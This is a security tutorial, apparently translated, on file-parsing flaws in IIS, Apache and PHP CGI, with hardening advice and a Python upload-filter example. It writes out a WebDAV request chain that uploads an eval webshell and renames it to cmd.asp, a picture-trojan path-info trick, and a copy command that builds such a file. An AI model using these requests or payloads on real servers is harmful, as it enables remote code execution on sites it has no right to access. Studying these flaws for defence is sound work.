I. IIS parsing vulnerabilities
1. When a folder is named with an *.asa or *.asp suffix, IIS parses every file inside that directory as an ASP file, whatever the file's own extension.
2. When a file is named *.asp;1.jpg, IIS 6.0 also executes it as an ASP script (the name is effectively truncated at the semicolon).
Microsoft does not regard this as a vulnerability and has not released a patch for IIS 6.0, so both of these "vulnerabilities" still exist.
3. WebDAV vulnerability (abuse of the IIS write permission)
Step one: use the OPTIONS method to probe which HTTP methods the server supports.
Request:
OPTIONS / HTTP/1.1
Host: www.example.com
Response:
...
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
...
Step two: upload a script file to the server with the PUT method.
Request:
PUT /a.txt HTTP/1.1
Host: www.example.com
Content-Length: 30

<%eval request ("Chopper")%>
Step three: rename the file with the MOVE or COPY method.
Request:
COPY /a.txt HTTP/1.1
Host: www.example.com
Destination: http://www.example.com/cmd.asp
Step four: with the DELETE method an attacker can likewise delete any file on the server.
Request:
DELETE /a.txt HTTP/1.1
Host: www.example.com
Every step of this chain depends on WebDAV being enabled with write permission on the directory; once WebDAV is disabled or the IIS write permission is removed, PUT, COPY, MOVE and DELETE are refused.
II. Apache parsing vulnerability
In Apache 1.x and Apache 2.x, a file named 1.php.rar is executed as a PHP file.
Apache parses file names by a simple rule: when it meets an extension it does not recognise, it works backwards from the right until it finds one it does recognise; if no extension is recognised, the file is served as-is and its source code is exposed.
This is how blacklist-based extension checks get bypassed.
The extensions Apache recognises are listed in conf/mime.types under the installation directory. The figure below shows the file on this machine, located at C:\wamp\bin\apache\Apache2.2.21\conf\mime.types.
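As an added illustration (not code from the original article), the following Python models the right-to-left extension rule described above, shows a naive blacklist check accepting the file names from the IIS and Apache sections, and shows a stricter allow-list check that rejects them. KNOWN_HANDLERS, BLACKLIST and ALLOWED are assumed example sets, not copied from any real mime.types or upload handler.

```python
import re

# Assumed subset of "known" extensions, as an Apache mime.types or AddHandler line
# would define them; constructed for this example. Note that "rar" is absent.
KNOWN_HANDLERS = {
    "php": "application/x-httpd-php",
    "html": "text/html",
    "jpg": "image/jpeg",
}


def apache_handler_for(filename):
    """Model of the rule in the text: walk the extensions from the right until a
    known one appears and return its handler; None means no extension was known,
    so the file would be served as-is (source exposed)."""
    extensions = filename.lower().split(".")[1:]
    for ext in reversed(extensions):
        if ext in KNOWN_HANDLERS:
            return KNOWN_HANDLERS[ext]
    return None


# Naive upload filter of the kind the parsing quirks defeat (assumed example set).
BLACKLIST = {"php", "php3", "asp", "asa", "aspx", "cer"}
# Allow-list used by the hardened check (assumed example set).
ALLOWED = {"jpg", "jpeg", "png", "gif"}


def blacklist_check(filename):
    """Naive check that inspects only the last extension; True means accepted.
    1.php.rar ends in 'rar' and 1.asp;1.jpg ends in 'jpg', so both slip through."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in BLACKLIST


def strict_check(filename):
    """Hardened check: exactly one allow-listed extension, a plain stem, and none of
    the characters the parsers above treat specially (path separators, ';', NUL)."""
    if not filename or any(c in filename for c in "/\\;\x00"):
        return False
    if filename.count(".") != 1:  # rejects 1.php.rar (Apache) and 1.asp;1.jpg (IIS 6)
        return False
    stem, ext = filename.split(".")
    return bool(re.fullmatch(r"[A-Za-z0-9_-]{1,64}", stem)) and ext.lower() in ALLOWED
```

For the PHP CGI case the name check alone is not enough, since a genuine .jpg is what ends up executed; that one has to be closed in the server configuration.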
III. PHP CGI parsing vulnerability
On some sites running Nginx, requesting http://www.xxser.com/1.jpg/1.php causes 1.jpg to be interpreted as a PHP script, even though 1.php does not exist.
This means an attacker can upload a legitimate-looking "picture" (a picture trojan) and then append "/xxx.php" to its URL to obtain a webshell on the site.
This is not an Nginx-specific vulnerability; the same parsing behaviour also occurs in web containers such as IIS 7.0, IIS 7.5 and lighttpd.
The parsing vulnerability is really a PHP CGI issue. The key option is cgi.fix_pathinfo in the PHP configuration file (on this machine C:\wamp\bin\php\php5.3.10\php.ini). It is enabled by default, and when the requested file does not exist PHP strips path components from the right until it reaches a file that does exist (here 1.jpg), executes that file and treats the remainder as PATH_INFO. Setting cgi.fix_pathinfo=0, or having the web server verify that the script file exists before handing the request to PHP, closes this.
Appendix: making a picture trojan with the copy command: copy 1.jpg/b + 1.php/a 2.php (where /b means binary file and /a means ASCII file).